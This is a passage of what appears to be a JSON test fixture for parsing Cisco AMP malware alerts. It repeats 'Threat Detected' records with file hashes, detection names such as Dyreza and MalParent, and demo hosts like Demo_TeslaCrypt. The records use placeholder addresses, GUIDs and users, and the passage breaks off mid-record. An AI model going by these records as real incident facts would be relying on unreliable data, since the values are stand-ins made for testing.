"W32.DFC.MalParent", - "cisco.amp.detection_id": "6159251520740130915", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "90:61:b5:c9:13:79" - ], - "cisco.amp.timestamp_nanoseconds": 3000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6159251520740131000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", - "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", - "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", - "file.name": "rjtsbks.exe", - "file.path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", - "fileset.name": "amp", - "host.hostname": "Demo_TeslaCrypt", - "host.name": "Demo_TeslaCrypt", - "host.os.family": "windows", - "host.os.platform": "windows", - "input.type": "log", - "log.offset": 76706, - "related.hash": [ - "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", - "209a288c68207d57e0ce6e60ebf60729", - "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" - ], - "related.hosts": [ - "Demo_TeslaCrypt" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:17:39.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "90:61:b5:c9:13:79" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.DFC.MalParent", - "cisco.amp.detection_id": "6159251516445163618", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "90:61:b5:c9:13:79" - ], - "cisco.amp.timestamp_nanoseconds": 988000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6159251516445164000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", - "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", - "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", - "file.name": "rjtsbks.exe", - "file.path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", - "fileset.name": "amp", - "host.hostname": "Demo_TeslaCrypt", - "host.name": "Demo_TeslaCrypt", - "host.os.family": "windows", - "host.os.platform": "windows", - "input.type": "log", - "log.offset": 78028, - "related.hash": [ - "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", - "209a288c68207d57e0ce6e60ebf60729", - "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" - ], - "related.hosts": [ - "Demo_TeslaCrypt" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:17:38.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "90:61:b5:c9:13:79" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.DFC.MalParent", - "cisco.amp.detection_id": "6159251512150196266", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "90:61:b5:c9:13:79" - ], - "cisco.amp.timestamp_nanoseconds": 942000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6159251512150196000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", - "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", - "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", - "file.name": "rjtsbks.exe", - "file.path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", - "fileset.name": "amp", - "host.hostname": "Demo_TeslaCrypt", - "host.name": "Demo_TeslaCrypt", - "host.os.family": "windows", - "host.os.platform": "windows", - "input.type": "log", - "log.offset": 152159, - "related.hash": [ - "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", - "209a288c68207d57e0ce6e60ebf60729", - "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" - ], - "related.hosts": [ - "Demo_TeslaCrypt" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:17:37.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176259080131182683", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" - ], - "cisco.amp.timestamp_nanoseconds": 996000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6176259080131183000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", - "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", - "input.type": "log", - "log.offset": 187917, - "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" - ], - "related.hosts": [ - "Demo_Dyre" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:17:37.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "90:61:b5:c9:13:79" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.File.MalParent", - "cisco.amp.detection_id": "6159251507855228943", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "90:61:b5:c9:13:79" - ], - "cisco.amp.timestamp_nanoseconds": 944000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6159251507855229000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", - "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", - "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", - "file.name": "rjtsbks.exe", - "file.path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", - "fileset.name": "amp", - "host.hostname": "Demo_TeslaCrypt", - "host.name": "Demo_TeslaCrypt", - "host.os.family": "windows", - "host.os.platform": "windows", - "input.type": "log", - "log.offset": 189236, - "related.hash": [ - "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", - "209a288c68207d57e0ce6e60ebf60729", - "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" - ], - "related.hosts": [ - "Demo_TeslaCrypt" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:17:36.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "90:61:b5:c9:13:79" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.3372C1EDAB-100.SBX.TG", - "cisco.amp.detection_id": "6159251503560261640", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "90:61:b5:c9:13:79" - ], - "cisco.amp.timestamp_nanoseconds": 821000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6159251503560262000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", - "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", - "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", - "file.name": "t.exe", - "file.path": "\\\\?\\C:\\t.exe", - "fileset.name": "amp", - "host.hostname": "Demo_TeslaCrypt", - "host.name": "Demo_TeslaCrypt", - "host.os.family": "windows", - "host.os.platform": "windows", - "input.type": "log", - "log.offset": 198516, - "related.hash": [ - "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", - "209a288c68207d57e0ce6e60ebf60729", - "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" - ], - "related.hosts": [ - "Demo_TeslaCrypt" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:17:25.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176259028591575130", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" - ], - "cisco.amp.timestamp_nanoseconds": 984000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6176259028591575000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", - "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", - "input.type": "log", - "log.offset": 207155, - "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" - ], - "related.hosts": [ - "Demo_Dyre" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:17:21.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "90:61:b5:c9:13:79" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.3372C1EDAB-100.SBX.TG", - "cisco.amp.detection_id": "6159251439135752194", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.file.parent.disposition": "Clean", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "90:61:b5:c9:13:79" - ], - "cisco.amp.timestamp_nanoseconds": 455000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6159251439135752000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", - "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", - "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", - "file.name": "t.exe", - "file.path": "\\\\?\\C:\\t.exe", - "fileset.name": "amp", - "host.hostname": "Demo_TeslaCrypt", - "host.name": "Demo_TeslaCrypt", - "host.os.family": "windows", - "host.os.platform": "windows", - "host.user.name": "user@testdomain.com", - "input.type": "log", - "log.offset": 208474, - "process.hash.md5": "8b88ebbb05a0e56b7dcc708498c02b3e", - "process.hash.sha1": "cea0890d4b99bae3f635a16dae71f69d137027b9", - "process.hash.sha256": "9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad", - "process.name": "explorer.exe", - "process.pid": 3164, - "related.hash": [ - "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", - "209a288c68207d57e0ce6e60ebf60729", - "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" - ], - "related.hosts": [ - "Demo_TeslaCrypt" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "related.user": [ - "user@testdomain.com" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:17:14.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176258981346934873", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" - ], - "cisco.amp.timestamp_nanoseconds": 346000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6176258981346935000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", - "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", - "input.type": "log", - "log.offset": 210041, - "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" - ], - "related.hosts": [ - "Demo_Dyre" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:17:02.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176258929807327320", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" - ], - "cisco.amp.timestamp_nanoseconds": 334000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6176258929807327000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", - "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", - "input.type": "log", - "log.offset": 211360, - "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" - ], - "related.hosts": [ - "Demo_Dyre" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:16:56.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "63:5f:47:2b:89:91" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.File.MalParent", - "cisco.amp.detection_id": "6533668623368585250", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "63:5f:47:2b:89:91" - ], - "cisco.amp.timestamp_nanoseconds": 753000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6533668623368585000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", - "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", - "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "file.name": "ekjrngjker.exe", - "file.path": "C:\\ekjrngjker.exe", - "fileset.name": "amp", - "host.hostname": "Demo_AMP_Threat_Audit", - "host.name": "Demo_AMP_Threat_Audit", - "host.user.name": "user@testdomain.com", - "input.type": "log", - "log.offset": 212679, - "related.hash": [ - "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "b99e0a8c56f963246b6464b9fffbf7a2", - "b024546a49bad1bd60fccef0a5d11b55f9a442c4" - ], - "related.hosts": [ - "Demo_AMP_Threat_Audit" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "related.user": [ - "user@testdomain.com" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:16:50.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176258878267719767", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" - ], - "cisco.amp.timestamp_nanoseconds": 322000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6176258878267720000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", - "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", - "input.type": "log", - "log.offset": 216643, - "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" - ], - "related.hosts": [ - "Demo_Dyre" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:16:38.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176258826728112214", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" - ], - "cisco.amp.timestamp_nanoseconds": 310000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6176258826728112000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", - "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", - "input.type": "log", - "log.offset": 217962, - "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" - ], - "related.hosts": [ - "Demo_Dyre" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:16:26.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "90:61:b5:c9:13:79" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.3372C1EDAB-100.SBX.TG", - "cisco.amp.detection_id": "6159251202912550913", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.file.parent.disposition": "Clean", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "90:61:b5:c9:13:79" - ], - "cisco.amp.timestamp_nanoseconds": 262000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6159251202912551000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", - "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", - "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", - "file.name": "t.exe", - "file.path": "\\\\?\\C:\\Windows\\System32\\t.exe", - "fileset.name": "amp", - "host.hostname": "Demo_TeslaCrypt", - "host.name": "Demo_TeslaCrypt", - "host.os.family": "windows", - "host.os.platform": "windows", - "host.user.name": "user@testdomain.com", - "input.type": "log", - "log.offset": 219281, - "process.hash.md5": "8b88ebbb05a0e56b7dcc708498c02b3e", - "process.hash.sha1": "cea0890d4b99bae3f635a16dae71f69d137027b9", - "process.hash.sha256": "9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad", - "process.name": "explorer.exe", - "process.pid": 3164, - "related.hash": [ - "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", - "209a288c68207d57e0ce6e60ebf60729", - "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" - ], - "related.hosts": [ - "Demo_TeslaCrypt" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "related.user": [ - "user@testdomain.com" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:16:10.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176258706469027925", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" - ], - "cisco.amp.timestamp_nanoseconds": 292000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6176258706469028000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", - "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", - "input.type": "log", - "log.offset": 220867, - "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" - ], - "related.hosts": [ - "Demo_Dyre" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:16:04.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176258680699224148", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" - ], - "cisco.amp.timestamp_nanoseconds": 286000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6176258680699224000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": 